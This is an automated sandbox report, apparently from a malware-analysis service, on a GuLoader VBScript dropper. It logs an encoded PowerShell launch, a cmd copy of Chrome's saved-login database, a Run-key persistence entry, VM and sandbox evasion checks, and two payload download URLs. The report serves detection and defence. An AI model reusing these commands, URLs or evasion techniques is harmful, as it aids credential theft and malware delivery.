Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A770 NtOpenThread, 18_2_1ED4A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49770 NtSetInformationFile, 18_2_1ED49770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49760 NtOpenProcess, 18_2_1ED49760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A710 NtOpenProcessToken, 18_2_1ED4A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49730 NtQueryVirtualMemory, 18_2_1ED49730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED495D0 NtClose, 18_2_1ED495D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED495F0 NtQueryInformationFile, 18_2_1ED495F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49560 NtWriteFile, 18_2_1ED49560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4AD30 NtSetContextThread, 18_2_1ED4AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49520 NtWaitForSingleObject, 18_2_1ED49520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A80 NtOpenDirectoryObject, 18_2_1ED49A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A10 NtQuerySection, 18_2_1ED49A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A3B0 NtGetContextThread, 18_2_1ED4A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49B00 NtSetValueKey, 18_2_1ED49B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED498A0 NtWriteVirtualMemory, 18_2_1ED498A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4B040 NtSuspendThread, 18_2_1ED4B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49820 NtEnumerateKey, 18_2_1ED49820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED499D0 NtCreateProcessEx, 18_2_1ED499D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49950 NtQueueApcThread, 18_2_1ED49950
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048195D0 NtClose,LdrInitializeThunk, 27_2_048195D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819540 NtReadFile,LdrInitializeThunk, 27_2_04819540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819560 NtWriteFile,LdrInitializeThunk, 27_2_04819560
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk, 27_2_048196D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_048196E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk, 27_2_04819610
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk, 27_2_04819650
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_04819660
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk, 27_2_04819780
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk, 27_2_04819FE0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk, 27_2_04819710
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk, 27_2_04819770
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk, 27_2_04819840
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk, 27_2_04819860
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk, 27_2_048199A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_04819910
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk, 27_2_04819A50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk, 27_2_04819B00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048195F0 NtQueryInformationFile, 27_2_048195F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819520 NtWaitForSingleObject, 27_2_04819520
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481AD30 NtSetContextThread, 27_2_0481AD30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819670 NtQueryInformationProcess, 27_2_04819670
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048197A0 NtUnmapViewOfSection, 27_2_048197A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A710 NtOpenProcessToken, 27_2_0481A710
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819730 NtQueryVirtualMemory, 27_2_04819730
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819760 NtOpenProcess, 27_2_04819760
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A770 NtOpenThread, 27_2_0481A770
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048198A0 NtWriteVirtualMemory, 27_2_048198A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048198F0 NtReadVirtualMemory, 27_2_048198F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819820 NtEnumerateKey, 27_2_04819820
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481B040 NtSuspendThread, 27_2_0481B040
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048199D0 NtCreateProcessEx, 27_2_048199D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819950 NtQueueApcThread, 27_2_04819950
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A80 NtOpenDirectoryObject, 27_2_04819A80
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A00 NtProtectVirtualMemory, 27_2_04819A00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A10 NtQuerySection, 27_2_04819A10
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A20 NtResumeThread, 27_2_04819A20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A3B0 NtGetContextThread, 27_2_0481A3B0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A370 NtCreateFile, 27_2_0064A370
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A420 NtReadFile, 27_2_0064A420
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A4A0 NtClose, 27_2_0064A4A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A550 NtAllocateVirtualMemory, 27_2_0064A550
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A36B NtCreateFile, 27_2_0064A36B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A41A NtReadFile, 27_2_0064A41A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A49A NtClose, 27_2_0064A49A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A54B NtAllocateVirtualMemory, 27_2_0064A54B
Java / VBScript file with very long strings (likely obfuscated code)
Source: MTIR22024323_0553381487_20220112120005.vbs Initial sample: Strings found which are bigger than 50
Source: MTIR22024323_0553381487_20220112120005.vbs ReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220113
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\FORSVARL.dat
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
Source: C:\Windows\SysWOW64\cmstp.exe File written: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBSAHYAZQBuACAAUABBA", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC11 push es; iretd 4_2_0761CC12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC88 push es; iretd 4_2_0761CC8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC8B push es; iretd 4_2_0761CC92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07616930 push es; ret 4_2_07616940
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED5D0D1 push ecx; ret 18_2_1ED5D0E4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0482D0D1 push ecx; ret 27_2_0482D0E4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_006479E4 pushfd ; retf 27_2_006479E5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00647316 push ds; retf 27_2_00647318
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D4C5 push eax; ret 27_2_0064D518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D57C push eax; ret 27_2_0064D582
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064E517 push ss; ret 27_2_0064E518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D512 push eax; ret 27_2_0064D518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D51B push eax; ret 27_2_0064D582
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064DE6D push dword ptr [ACFE0177h]; ret 27_2_0064DF57
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
Source: C:\Windows\SysWOW64\cmstp.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.WIZUMIYA.CO.JP/HTML/USER_DATA/ORIGINAL/IMAGES/BIN_WUOAIR166.BINHTTP://FAHRSCHULE-HELI.AT/BIN_WUOAIR166.BIN
Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000639904 second address: 000000000063990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000639B7E second address: 0000000000639B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2992
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 666
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.7 %
Found WSH timer for Javascript or VBS script (likely evasive script)
